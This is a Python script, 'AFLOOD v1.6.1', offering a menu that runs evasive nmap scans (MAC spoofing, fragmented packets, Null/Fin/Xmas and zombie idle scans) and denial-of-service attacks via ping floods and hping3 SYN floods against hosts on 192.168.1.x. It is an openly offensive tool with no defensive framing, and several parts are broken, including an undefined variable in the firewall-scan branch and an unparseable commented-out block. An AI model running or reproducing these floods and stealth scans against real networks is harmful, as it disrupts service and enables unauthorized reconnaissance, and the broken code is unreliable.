#! /usr/bin/python
# -*- coding: utf-8 -*-

from __future__ import print_function
from libnmap.parser import NmapParser
from libnmap.objects import host
import os


select = 0
ip_num = 0
time = 0

print ("Welcome to AFLOOD v1.6.1")

'''

def installed(application):
    print("Seems you have not installed", application)
    select = raw_input("Do you want to install it? [y/n]: ")
    if select == "y" :
        cmdstring = "apt-get install %s -y" % (application)
        os.system(cmdstring)
        return
    else:
        print("You cannot use this function!")
        return

        #if e.errno == os.errno.ENOENT:
'''
        
def nmap(select):
    print ("[1]: OS finding (Nmap) $")
    print ("[2]: Port scan (Nmap) $$")
    print ("[3]: Firewall detection (Nmap) $")
    print ("[4]: Firewall scan (Nmap) $")
    print ("[5]: Zombie scan (Nmap)")
    print ("[0]: Back")
    select = int(input("Insert a number: "))
    
    if select == 0:
        return
    
    list=["OS finding","Port scanning","Firewall Detection","Firewall scan (N)","Zombie scan (?)"]
    print (list[select-1])
    ip_num = int(input("Write the IP of the target (last digit) (0-255): "))
    if ip_num < 255 and ip_num > 0 :
        
        if select == 1:
            print("OS 192.168.1.", ip_num, sep="")
            cmdstring = "nmap -A 192.168.1.%s" % (ip_num)
            #--spoof-mac 0 -e -Pn
            
        elif select == 2:
            print("Port scanning 192.168.1.", ip_num, sep="")
            cmdstring = "nmap --spoof-mac 0 -v -sT --open -Pn -PN -sV 192.168.1.%s" % (ip_num)

        elif select == 3:
            print("Firewall detection at 192.168.1.", ip_num, sep="")
            cmdstring = "nmap -sA -f -Pn -sV 192.168.1.%s" % (ip_num)

        elif select == 4:
            print("Select firewall scan type:")
            print ("[1]: TCP Null scan")
            print ("[2]: TCP Fin scan")
            print ("[3]: TCP Xmas scan")
            list=["Null","Fin","Xmas"]
            select = int(input("(1-3): "))
            print("TCP ",list[m-1]," scan at 192.168.1.", ip_num, sep="")
            if select == 1:
                cmdstring = "nmap -sN -f 192.168.1.%s" % (ip_num)
            elif select == 2:
                cmdstring = "nmap -sF -f 192.168.1.%s" % (ip_num)
            elif select == 3:
                cmdstring = "nmap -sX -f 192.168.1.%s" % (ip_num)

        elif select == 5:
            print("Write the IP of the zombie (last digit)")
            select = int(input("(0-255): "))
            print("Zombie scan at 192.168.1.", ip_num, sep="")
            cmdstring = "nmap -sI 192.168.1.%s 192.168.1.%s" % (select, ip_num)

        os.system(cmdstring)

    else:
        print("Wrong number!")
    
def dos(select):
    print ("[1]: Ping flooding")
    print ("[2]: Ping flooding (with timeout)")
    print ("[3]: SYN flooding")
    print ("[0]: Back")
    
    select = int(input("Insert a number: "))
    
    if select == 0:
        return
    
    list = ["Ping flooding","Ping flooding (with timeout)","Syn flooding"]
    print (list[select-1])
    ip_num = int(input("Write the IP (last digit) (0-255): "))
    if ip_num < 255 and ip_num > 0 :

        if select == 1:
            print("Ping flooding at IP 192.168.1.", ip_num, sep="")
            cmdstring = "ping  -f -i 0.001 -s 65000 192.168.1.%s" % (ip_num)

        elif select == 2:
            print("Ping flooding at IP 192.168.1.", ip_num, sep="")
            time = int(input("Write the timeout (Second): "))
            cmdstring = "ping -f -i 0.001 -w %s -s 65000 192.168.1.%s" % (time, ip_num)

        elif select == 3:
            print("SYN flooding at IP 192.168.1.", ip_num, sep="")
            cmdstring = "hping3 -f --flood -S -p 80 192.168.1.%s" % (ip_num)              

        os.system(cmdstring)

    else:
        print("Wrong number!")
"""
def smartnmap():

    #nmap -f -sn 192.168.1.1/24 -oG /root/Desktop/aflood/nmapoutput
    #-oG grepable -oX xml
    
    #need to install libnmap
    #pip install libnmap
    #or
    #git clone https://github.com/savon-noir/python-libnmap.git
    #cd python-libnmap
    #python setup.py install
    
    os.system("nmap -f -sn 192.168.1.1/24 -oG /root/Desktop/aflood/nmapoutput")
    
    nmapoutput = NmapParser.parse_fromfile("/root/Desktop/aflood/nmapoutput.xml")
    maclist = NmapParser.parse_fromfile("/root/Desktop/aflood/maclist.xml")

    hosts = doc.getElementByTagName("host")[0]
    users = maclist.getElementByName("user")[0]
    
    for host in hosts:
        if hosts.getAttribute("addrtype") == "mac":
        macfind = host.getAttribute("addr")
        for user in users:
            macsave = host.getElementByName("mac")[0]
            if macfind == macsave:
                ipname = host.getAttribute("ipv4")
                name = host.getElementByName("name")[0]
                print ("%s has this IP: %s" %(name, ipname))
            
"""         
        



    
while True:
    
    print ("[1]: Nmap scan $")
    print ("[2]: Other Nmap options")
    print ("[9]: DOS attack")
    print ("[0]: Exit")
    
    select = int(input("Insert a number: "))

    if select == 1:
        print ("Nmap scan")
        os.system("nmap -f -sn 192.168.1.1/24")

    elif select == 2:
        nmap(select)

    elif select == 9:
        dos(select)

    elif select == 0:
        print ("Exit")
        exit()

#><
